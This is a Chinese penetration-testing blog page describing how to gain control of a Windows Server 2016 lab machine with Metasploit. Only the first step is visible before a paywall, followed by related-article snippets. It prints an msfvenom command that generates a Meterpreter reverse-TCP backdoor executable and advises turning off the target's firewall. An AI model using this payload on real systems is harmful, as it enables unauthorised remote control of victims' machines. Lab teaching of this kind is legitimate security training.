metasploit上线windows2016靶机

最新推荐文章于 2025-03-28 19:42:05 发布

原创

最新推荐文章于 2025-03-28 19:42:05 发布

· 929 阅读

3 ·

版权

文章标签：

#metasploit

文章目录

一、生成后门
二、windows2016靶机下载后门
- - 1、首先，我们需要开启apache2，然后将后门放入/var/www/html目录下
  - 2、windows2016下载后门程序
三、设置监听
- - 1、开启metasploit
  - 2、设置监听模块
四、上线windows2016靶机
- - 1、先点击run，然后在运行windows2016靶机的后门程序
  - - 注：由于本人表达能力不怎么样，如有冒犯或错误，请及时告知，谢谢！

攻击机：kali
靶机：windows2016

一、生成后门

由于这个后门没有经过免杀，所以需要你们把windows2016防火墙关闭，你们·可以·自己去学习一下免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.1(自己kali的IP) lport=50000 -f exe>test.exe

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

ter_ret

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
4
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Windows - SMB 远程代码执行漏洞（永恒之蓝） - CVE-2017-0146 & MS17-010

Blue17 の小窝

03-22

1221

永恒之蓝漏洞（MS 17-010、

Windows 靶机常见服务、端口及枚举工具与方法全解析：SMB、LDAP、NFS、RDP、WinRM、DNS

vortex5的博客

01-25

1534

在渗透测试中，Windows 靶机通常会运行多种服务，每种服务都有其默认端口和常见的枚举工具及方法。以下是 Windows 靶机常见的服务、端口、枚举工具和方法的详细说明：enum4linux： nxc（NetExec，原名 CrackMapExec）： smbclient： rpcclient：枚举方法：列出共享：枚举用户：枚举组： 2. LDAP（Lightweight Directory Access Protocol）端口： 389/TCP：L

4 条评论您还未登录，请先登录后发表或查看评论

HTB靶场系列 Windows靶机 Blue靶机

m0_57221101的博客

01-26

1545

ms17-010漏洞，也就是广为人知的永恒之蓝，非常简单的一个靶机，因为几乎不用提权，ms17-010漏洞使用成功获取的就是system级别的权限勘探常规操作先用nmap扫 nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.40 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-03 21:00 EDT Warning: 10.10.10.40 giving up on por

windows靶机_【内网渗透】Windows下的内网传输技术

weixin_39984403的博客

01-26

451

点击上方“公众号” 可以订阅哦！Hello，各位小伙伴大家好~掐指一算，好像已经一个月没更新过了...趁着现在不忙(才不是偷懒)赶紧更新一波~今天给大家分享的内容是Windows内网传输技术：有时候我们拿到一个不能上传shell，但可以命令执行的windows服务器时，可以通过多种方法进行文件上传和下载。一起来看看吧！Part.1FTPFTP环境部署首先，ftp支持ASCII码传输、也...

kali利用msf渗透Windows电脑测试

最新发布

2403_90011488的博客

03-28

1140

MSF集成了数千个已知的软件漏洞利用模块，支持针对不同平台（如Windows、Linux）和服务（如SMB）的漏洞攻击。例如，著名的永恒之蓝漏洞 (MS17_010)就是通过MSF进行利用的。

HTB靶场系列 Windows靶机 Legacy靶机

程序员阿飘的博客

01-10

525

本文已参与「新人创作礼」活动，一起开启掘金创作之路。

在Windows环境中搭建不同靶机

weixin_51240556的博客

10-03

1770

在Windows环境中搭建不同靶机实验环境： VMware Workstation 实验器材： Windows2008或者windows2016 .XAMPP 一．搭建靶机DVWA如下图： 1.编辑 c:\xampp\apache\conf\httpd.conf: 在这里插入图片描述在这里插入图片描述在这里插入图片描述 2.复制 DVWA-master 源码到 C:\xampp\htdocs重命名为dvwa并解压，要保证网站文件在 C:\xampp\htdocs\dvwa 下在这里插入图片描述3.重启

（菜鸟自学）搭建虚拟渗透实验室——安装Windows 7 靶机

nbdlsplyb的博客

01-14

3950

依次点击“开始”》“控制面板”》“网络和Internet”》“网络和共享中心”》“更改适配器设置”》右击“本地连接”，单击属性》点击“IPv4”》配置相应的IP地址、掩码、网关。点击“下一步”》勾选“我接受许可条款”，点击“下一步”》点击“自定义”，随即点击“下一步”，将开始进行安装，此过程缓慢，请耐心等待，待安装完毕系统将自动进行重启。加载VMware Tools的安装程序，运行该安装程序并选用“典型安装”，安装完成将会提示重启，重启之后将生效。新建一台虚拟机，并选择Windows 7系统。

HTB靶场系列 Windows靶机 Optimum靶机

m0_57221101的博客

01-28

2701

勘探依然是nmap扫描 nmap 10.10.10.8 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 21:58 EST Nmap scan report for 10.10.10.8 Host is up (0.031s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1

使用Metasploit生成木马控制Windows系统

weixin_56956399的博客

04-12

2383

使用Metasploit生成木马控制Windows系统

简单的Metasploit及cs提权

m0_74326506的博客

07-06

2081

但是因为windows中存在服务控制管理器，当服务启动时，会跟服务控制管理器通信，服务控制管理器如果没收到通信，则会认为服务出现错误，终止进程，因为后门木马文件本质并不是服务，无法和服务控制管理器进行通信，所以要么直接上线不了，要么上线一会就下线。在windows中 MSI是微软的安装包格式，他会在后台运行.exe，并以system权限启动安装，如果制作一个MSI安装包绑定生成的后门木马，只要win7点击安装，则会以system上线msf，制作MSI安装包可以在网上找。

windows靶机60-100

2201_75378806的博客

03-27

6975

RTF是一种文本文件格式，旨在存储文本文档的格式化信息，例如字体、颜色和样式，而无需包含实际的二进制图像或多媒体数据。

渗透测试新手练习及高手深入挖掘专用Linux及Windows靶机（官方原版镜像）

05-08

本人学习时使用的的这两个系统，常见的高风险漏洞较多，容易利用，适合新手练习。 metasploitable-linux为常用的Linux靶机，系统包含了很多高风险漏洞、弱口令及容易利用的端口、服务，是渗透测试初学者练习技术的不二之选。 Windows_xp_pro_with_sp2就更不用说了，都被人挖烂了，sp2版本相比sp3更简单一些，适合新手练习。

metasploit解决windows靶机乱码问题

qq_53030229的博客

11-08

441

当metasploit获取windows权限之后发现乱码 chcp 65001 例：解决方法：

Windows系统——ATT&CK靶场（一）——MSF方式

qq_44029310的博客

06-26

3129

本文涉及知识点有：环境搭建，nmap使用，mysql日志文件写 shell，yxcms历史漏洞，进程迁移，提权，kiwi模块使用，3389相关，配置路由和代理，横向移动，msf相关使用等。

win7 环境靶机_靶机中心 - lsh4ck's Blog

weixin_36314050的博客

12-31

977

2008R2数据中心版 x64基础web环境IIS 7.5 + MSSQL 2008R2Apache/2.2.15 + Mysql 5.5.61 + php-5.4.19jdk1.8.0_171 + apache-tomcat-7.0.92默认web目录TOMCAT C:\apache-tomcat-7.0.92\webapps\ROOTApache C:\Wamp\apache2.4\htdoc...

OWASP靶机下载安装

m0_63602484的博客

04-18

1822

第一次安装这个靶机的时候，发现靶机未显示ip地址，我也是通过自行配置ip地址才解决了无法访问的问题。2. 下载完成后，解压缩（这里自行创建目录文件即可，注意：路径中尽量不要出现中文字符）1. 开启VM虚拟机，选择打开虚拟机，选中刚才安装的OWASP靶机的.vmx文件即可。4. 输入账户和密码（这里提示用户名为:root,密码为：owaspbwa)2. 开启OWASP虚拟机，这里网络适配器应为NAT模式。6.通过浏览器访问OWASP靶机的web界面。3. 选择我已复制该虚拟机。

Windows终端DVWA靶机搭建

唯以的博客

01-23

694

实验所需安装包链接：https://pan.baidu.com/s/13FDZNcL4JGBSpu0A2QtvMg 提取码：jhwo 首先安装XAMPP软件使用的是XAMPP5.6版本开始搭建DVWA靶场 Site key: 6LdJJlUUAAAAAH1Q6cTpZRQ2Ah8VpyzhnffD0mBb Secret key: 6LdJJlUUAAAAAM2a3HrgzLczqdYp4g05EqDs-W4K 搭建DVWA到这里就全部结束了 ...

应急响应靶机-windows近源攻击-知攻善防实验室

m0_62840741的博客

09-27

1341

前景需要：小王从某安全大厂被优化掉后，来到了某私立小学当起了计算机老师。某一天上课的时候，发现鼠标在自己动弹，又发现除了某台电脑，其他电脑连不上网络。感觉肯定有学生捣乱，于是开启了应急。